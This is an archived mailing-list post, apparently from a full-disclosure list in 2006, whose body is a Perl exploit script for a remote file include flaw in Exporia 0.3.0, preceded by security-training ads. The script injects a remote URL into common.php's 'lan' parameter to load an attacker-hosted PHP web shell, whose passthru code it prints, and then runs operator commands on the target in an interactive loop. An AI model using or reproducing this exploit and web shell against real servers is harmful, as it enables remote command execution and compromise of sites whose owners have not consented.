Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | Exporia => 0.3.0 Remote File Include Vulnerability Exploit |
|---|---|
| Date: | 28 Oct 2006 07:40:59 -0000 |
#!/usr/bin/perl # Script.............. :Exporia # Discovered By.... : Root3r_H3ll # Location .......... : Iran # Class.............. : Remote # Original Advisory : http://Www.PersainFox.com & Www.Arashrj.ir # We ArE : Root3r_H3LL & Arash.Rj # <Spical TNX Irania Hackers : # ( Aria-Security , Crouz , DeltaHacking , Iranhackers # Kapa TeaM , Ashiyane , Shabgard , Simorgh-ev , Xmors ) use LWP::Simple; print "...............................................................\n"; print ". .\n"; print ". Exporia => 0.3.0 Remote File Include Vulnerability .\n"; print ". .\n"; print "...............................................................\n"; print ". .\n"; print ". PerSiaNFox NetWork Security TeaM .\n"; print ". Discovered By : Root3r_H3ll .\n"; print ". .\n"; print "...............................................................\n"; print ". .\n"; print ". Www.PerSiaNFox.coM .\n"; print ". .\n"; print "...............................................................\n"; print "\n"; print " I Love HacK & SecUrity \n"; print "\n\n"; my $kw3,$path,$shell,$conexiune,$cmd,$data ; if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);} $path = $ARGV[0]; chomp($path); $shell = $ARGV[1]; chomp($shell); $path = $path."/common.php"; sub usage(){ print "Usage : perl $0 host/path http://site.com/cmd.txt\n\n"; print "Example : perl $0 http://127.0.0.1 http://site.com/cmd.txt\n\n"; print 'Shell : <?php ob_clean();ini_set("max_execution_time",0);passthru($_GET["cmd"]);die;?>'; } while () { print "[Root3r_H3LL][Arash.rj]"; chomp($cmd=<STDIN>); if ($cmd eq "exit") { exit(0);} $kw3 = $path."?lan=".$shell."?&cmd=".$cmd; if ($cmd eq "") { print "Enter your command !\n"; } else { $data=get($kw3); print $data ; } }
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | [Full-disclosure] [ GLSA 200610-15 ] Asterisk: Multiple vulnerabilities, Raphael Marichez |
|---|---|
| Next by Date: | bbsNew => 2.0.1 Remote File Include Vulnerability Exploit, h4ck3riran |
| Previous by Thread: | [Full-disclosure] [ GLSA 200610-15 ] Asterisk: Multiple vulnerabilities, Raphael Marichez |
| Next by Thread: | bbsNew => 2.0.1 Remote File Include Vulnerability Exploit, h4ck3riran |
| Indexes: | [Date] [Thread] [Top] [All Lists] |